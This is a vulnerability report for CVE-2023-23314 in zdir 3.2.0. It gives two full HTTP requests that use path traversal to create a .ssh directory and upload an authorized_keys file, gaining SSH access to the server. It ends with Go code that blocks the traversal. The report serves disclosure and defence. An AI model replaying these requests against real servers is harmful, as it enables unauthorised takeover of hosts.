CVE-2023-23314: File upload ssh authorized_keys causes RCE · Issue #90 · helloxz/zdir

An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.


Steps to reproduce:

zdir version: 3.2.0

git clone https://github.com/helloxz/zdir

go run main.go init

modify the file /zdir/data/config/config.ini

start the server

View the routes; the interface requires login credentials.

Enter the controller.Mkdir method; the parameters submitted by the POST request are name and path.

Enter the !V_dir method and find that it only checks whether the passed path is a folder.

This creates a .ssh directory via directory traversal:

POST /api/dir/create HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 28
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Token: 433a01baeaa6c37ef46f21621cc06f95
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: application/json, text/plain, */*
X-Cid: bPlNFG
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

path=/../../../../&name=.ssh

Enter the controller.Upload method; the upload path can be specified by the client.

There is a loophole in the regex that determines whether the path is legal; it can be bypassed with /…/.

It then checks whether the target folder exists and terminates if it does not. So the directory traversal above is used to create the folder first, and the file is then uploaded under its original file name, which is not renamed.

POST /api/upload HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 897
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
X-Token: 433a01baeaa6c37ef46f21621cc06f95
X-Cid: bPlNFG
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="path"

/../../../../../../home/kali/.ssh
------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="file"; filename="authorized_keys"
Content-Type: text/plain

ssh-rsa

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--

Generate an SSH public key for the upload.

Then ssh can be used to connect to the server.
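Both requests above go through because the mkdir and upload handlers validate the raw path string with a pattern check and then trust the client-supplied file name. As an added example (not zdir's code), the check a Go file server should apply instead: let filepath.Join canonicalise the path, verify with filepath.Rel that the result stays under the storage root, and require the uploaded file name to be a bare base name. The root /srv/zdir/data and the function names are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

var (
	ErrOutsideRoot = errors.New("path escapes storage root")
	ErrBadFilename = errors.New("filename must be a plain base name")
)

// SafeJoin resolves a client-supplied path against the storage root and returns
// the absolute target only if it stays inside root. Join collapses "..", "." and
// repeated separators first, so every spelling of traversal is caught by the
// containment test. Symlinks inside root need filepath.EvalSymlinks in addition.
func SafeJoin(root, userPath string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	target := filepath.Join(absRoot, userPath) // Join also runs filepath.Clean
	rel, err := filepath.Rel(absRoot, target)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return target, nil
}

// SafeUploadTarget additionally requires the multipart filename to be a bare
// base name, so no directory components can be smuggled through that field.
func SafeUploadTarget(root, dir, filename string) (string, error) {
	if filename == "" || filename == "." || filename == ".." || filepath.Base(filename) != filename {
		return "", ErrBadFilename
	}
	return SafeJoin(root, filepath.Join(dir, filename))
}

func main() {
	const root = "/srv/zdir/data" // constructed example root, not a real deployment
	for _, p := range []string{"/../../../../", "/../../../../../../home/kali/.ssh", "docs/2023"} {
		t, err := SafeJoin(root, p)
		fmt.Printf("%-40q -> %q %v\n", p, t, err)
	}
}
```

The first two inputs are the path values from the requests above and are rejected; only the benign relative path resolves.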
